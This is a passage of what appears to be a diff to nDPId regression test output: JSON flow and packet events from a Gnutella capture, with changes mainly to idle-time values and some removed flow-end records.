+00441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1971,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":3,"flow_last_seen":115039,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":115039,"pkt":"UlQAEjUCCAAn5uVZCABFAAAobAxAAIAGmlkKAAIPRXai5cSXtzoqx\/sFAPMqAlAQ+vDz5AAA"} +00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1972,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":114930,"flow_last_seen":115040,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":533,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":115040,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50327,"dst_port":46906,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1974,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":2,"flow_last_seen":115124,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":115124,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsBeQAAEAGYvO9k0hTCgACD2X8xJgA9CQBhHBOQWAS\/\/9j5QAAAgQFtA=="} +00441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1975,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":3,"flow_last_seen":115126,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":115126,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoz\/tAAIAGGN8KAAIPvZNIU8SYZfyEcE5BAPQkAlAQ+vCAsQAA"} +00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1976,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":114930,"flow_last_seen":115127,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":538,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":115127,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"189.147.72.83","src_port":50328,"dst_port":26108,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially 
Dangerous","category":"Download"}} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1980,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":115369,"flow_last_seen":115369,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":115369,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":28681,"dst_port":37058,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1980,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":335,"flow_packet_id":1,"flow_last_seen":115369,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":115369,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4ticAAIARadEKAAIPDsj\/5XAJkMIAJDeaLGAxAs8iaaH\/Df9W3JltAwABAAUAAADDglFLQA=="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1982,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":335,"flow_packet_id":2,"flow_last_seen":115702,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":115702,"pkt":"CAAn5uVZUlQAEjUCCABFAABKBegAAEARWf8OyP\/lCgACD5DCcAkANl\/hLGAxAs8iaaH\/Df9W3JltAwEBABcAAADCkA7I\/+WyNgAAAAAgAMOCUUtEGERIlw=="} 
@@ -1153,11 +1153,11 @@ 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2125,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":124090,"flow_last_seen":124090,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":124090,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"207.38.163.228","src_port":28681,"dst_port":6778,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2125,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":1,"flow_last_seen":124090,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":124090,"pkt":"UlQAEjUCCAAn5uVZCABFAABtN+oAAIARg3wKAAIPzyaj5HAJGnoAWUl8GqIxAsDHb8ARC\/TCVyKtTkQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} 
01408{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2126,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":340,"flow_packet_id":2,"flow_last_seen":124181,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":124181,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBkkAAEARxyomjnfqCgACD8JEcAkC3z99SEIxAiBrw4qXLe42xzCJ9UQAAMACAAAGR1RLRwAAjVz9Bf0jf1LZ5zMd\/xsbFCoGHdIEJo536sJEAQAAAAT9X3JyFEdUS0cAAIQFsf+Bv2njsZMOcK5XBzk5Qq3rBN3GzcRRKkdUS0cAAIPPdMtTw3ywAQrcKHskULaFt8T9BFd7NurTckdUS0cAAIBDDfCNVDqFgBWTNBe\/R1a2V7AXBLm7Sq3Q8VdTSFIAAIsML3baZ9qjEzov01XuwUWPp8CvBBiB6TxOFldTSFIAAIgInuBYn2DWNYTpgSOhE3nGOSSqBGLQGpoTgldTSFIAAJMpLUy99S6l5+o3G\/7HZbY0zUPGBFnUW5sUS1NOT1cAAJJLJdecP9uDvZhuUeP7MwcedtuWBM8mo+QaekdUS0cAAJ6Xxzbx1oA8a67zMFTEYzHds+ukBEziVWkYyldTSFIAAJ7Bez1ZQQgPxovuLAykgS8CMrDdBLAKqQox\/0dUS0cAAJp\/6ofTpH0Z7c9sfONgy\/6jjg5ZBFTFYV4FUFdTSFIAAJgFqYyWS9v2Yq4KyYrmzTVJWc5SBGP6\/WMuK0dUS0cAAKZeyrvsa5mvejLQ38QnOIQ2zbdtBGQB54rc7ldTSFIAAKQeYlqSZYffwoHRlw8bFrfmBFSvBFQcNeGvO0dUS0cAAK10JPaTOb0hgYkPVi8cpzY7gtJoBFx1+WIan1dTSFIAAKr7G8iP9T\/W+jUmPMkpEJiqR57KBMvcaRtLPEdUS0cAALd6AZ7svQKtiRxAHRTzpxSemu\/LBNXlb+ATDEdUS0cAALSr6ArQaneMzMJ81PWuqjO12gqLBLV2NdR1LkdUS0cAALNy1PV19iuZm7NzjEzMA6wUOO22BFJALAsFSEdUS0cAALFbZ+HgSIrho0RaGRNTd1qTgMZFBC0fmHBo40dUS0cAAL1cZVAaZZhJTOPlkpw6jfT8aYRtBD\/kr6kHkA=="} -00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2164,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":126831,"flow_last_seen":126831,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":126831,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50330,"dst_port":46906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2164,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":1,"flow_last_seen":126831,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":126831,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0bCBAAIAGmjkKAAIPRXai5cSatzq0d6IdAAAAAIAC+vCtSgAAAgQFtAEDAwgBAQQC"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2165,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":2,"flow_last_seen":126943,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":126943,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsBmMAAEAGf\/9FdqLlCgACD7c6xJoBCaABtHeiHmAS\/\/8wNgAAAgQFtA=="} -00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2166,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":3,"flow_last_seen":126943,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":126943,"pkt":"UlQAEjUCCAAn5uVZCABFAAAobCFAAIAGmkQKAAIPRXai5cSatzq0d6IeAQmgAlAQ+vBNAgAA"} -00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2167,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":126831,"flow_last_seen":126944,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":513,"flow_tot_l4_payload_len":513,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":126944,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50330,"dst_port":46906,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2164,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":126831,"flow_last_seen":126831,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":126831,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50330,"dst_port":46906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2164,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":1,"flow_last_seen":126831,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":126831,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0bCBAAIAGmjkKAAIPRXai5cSatzq0d6IdAAAAAIAC+vCtSgAAAgQFtAEDAwgBAQQC"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2165,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":2,"flow_last_seen":126943,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":126943,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsBmMAAEAGf\/9FdqLlCgACD7c6xJoBCaABtHeiHmAS\/\/8wNgAAAgQFtA=="} 
+00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2166,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":3,"flow_last_seen":126943,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":126943,"pkt":"UlQAEjUCCAAn5uVZCABFAAAobCFAAIAGmkQKAAIPRXai5cSatzq0d6IeAQmgAlAQ+vBNAgAA"} +00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2167,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":126831,"flow_last_seen":126944,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":513,"flow_tot_l4_payload_len":513,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":126944,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50330,"dst_port":46906,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2197,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":129174,"flow_last_seen":129174,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":129174,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.226.85.105","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2197,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":346,"flow_packet_id":1,"flow_last_seen":129174,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":129174,"pkt":"UlQAEjUCCAAn5uVZCABFAABtuPMAAIAR0zIKAAIPTOJVaXAJGMoAWVtEeBkxArN0R\/zFhR7fMHiNqUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2198,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":129174,"flow_last_seen":129174,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":129174,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.10.169.10","src_port":28681,"dst_port":12799,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -1283,21 +1283,6 @@ 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2817,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":174343,"flow_last_seen":174343,"flow_idle_time":180000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":174343,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.147.52.21","src_port":28681,"dst_port":36728,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2817,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":368,"flow_packet_id":1,"flow_last_seen":174343,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":128,"pkt_l4_len":94,"thread_ts_msec":174343,"pkt":"UlQAEjUCCAAn5uVZCABFAAByuwkAAIARD7sKAAIPL5M0FXAJj3gAXq06x7YxAq8Sv7XsAP61JE4GfUQAAD8AAAAHR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAF3Q\/QP6n0+w02aNGZLhtNuwNXioAEFMT0M="} 
01407{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2827,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":367,"flow_packet_id":2,"flow_last_seen":174648,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":174648,"pkt":"CAAn5uVZUlQAEjUCCABFAALzB\/MAAEARKy2VHKOvCgACD8MkcAkC37mfNNYxAkNtQBP87WWbzy94OkQAAMACAAAGR1RLRwAAQTW8kBkL86J3th0pUYoQZu1JqkUElRyjr8MkAQAAAAThq6+iFEdUS0cAAFxg+taEWAYB1unX7flSWQRG3beNBGic4kjQCkdUS0cAAFuWTCQAv7KdBMgSGC6mmSLY5\/ECBMKjtH4qSVdTSFIAAFpCOi4aZIiG9lYEyciBumqkMMTzBMY62gy7KEdUS0cAAFf2jq05FgyfJOGIcRJLg6NdtQ1eBLw9NLcuTEdUS0cAAFYaYH8fxSMCFJGx6KJ1XnlYMcAbBL7A0rYaYkdUS0cAAFFI2BA3K8AVe0IqJAEnw9\/D630lBI6EpQ13ZkdUS0cAAFITSOd3gRniYdJwpHJZH2SZ8zLzBFaBxFQmu1dTSFIAAEwNRRSjJbzqx43c9rTKLbxkbHgKBF4IN57HxEdUS0cAAElxJg9dajjzW3txW7a4q7j8IGI0BFHNWy2VmVdTSFIAAEJDtkelhifx87ftq707Fzo\/U0PdBC+TNBWPeEdUS0cAAGqU5DC0wpx7Tt\/+AtuQJkODlGIrBC\/cuoxr+UdUS0cAAGSQPhJYYczqO9fA1uqwCWebPjcpBMEgftbozEdUS0cAAGfwY9tAxh1AXF0ZU2EOIfqDQ08tBHbwRccYzEdUS0cAAGcZJHUoqfb+iSo9+1Aaw4nAX4zABFAH\/MAa6EdUS0cAABnDsbPWKLbuWCN54AyWtjRM+4cSBFlLNBOzukdUS0cAABjf5v+Urk90V\/WPMxinQSIciE4\/BDzxMMJTNUdUS0cAABiF4URzeX7Vdi93GjTzJphEA0s1BC6AcmsZsldTSFIAABreJpDCEhk5HaHmWa2KZ2KgQT+tBFLZsDQdFkdUS0cAABpaaFBDXGgpcSmxYhITGidbcBteBEuFZV3Mj0dUS0cAABZMZh8YJqCRZ8rsFWpJujOrF1VMBFHNWy2cyQ=="} -00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2959,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":63000,"flow_last_seen":63524,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":1137,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":181645,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.250.6.59","src_port":50196,"dst_port":12556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00794{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2959,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":64032,"flow_last_seen":64562,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":181645,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"175.181.156.244","src_port":50206,"dst_port":8255,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2959,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":69141,"flow_last_seen":69581,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1141,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":181645,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.242.225","src_port":50232,"dst_port":15068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2959,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":68108,"flow_last_seen":68639,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1147,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":181645,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"116.241.162.162","src_port":50226,"dst_port":15677,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2959,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":64030,"flow_last_seen":65583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":181645,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.238.173.128","src_port":50202,"dst_port":57648,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2959,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":64030,"flow_last_seen":65583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":181645,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.238.173.128","src_port":50202,"dst_port":57648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2959,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":63001,"flow_last_seen":63616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1136,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":181645,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.168.15.71","src_port":50197,"dst_port":3931,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2959,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":67093,"flow_last_seen":69216,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":181645,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"119.14.143.237","src_port":50222,"dst_port":6523,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00556{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2959,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":67093,"flow_last_seen":69216,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":181645,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"119.14.143.237","src_port":50222,"dst_port":6523,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2959,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":67092,"flow_last_seen":69473,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":181645,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.233.196.226","src_port":50220,"dst_port":3820,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00556{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2959,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":67092,"flow_last_seen":69473,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":181645,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.233.196.226","src_port":50220,"dst_port":3820,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2959,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":64031,"flow_last_seen":64521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1140,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":181645,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.222.160.99","src_port":50203,"dst_port":18994,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": 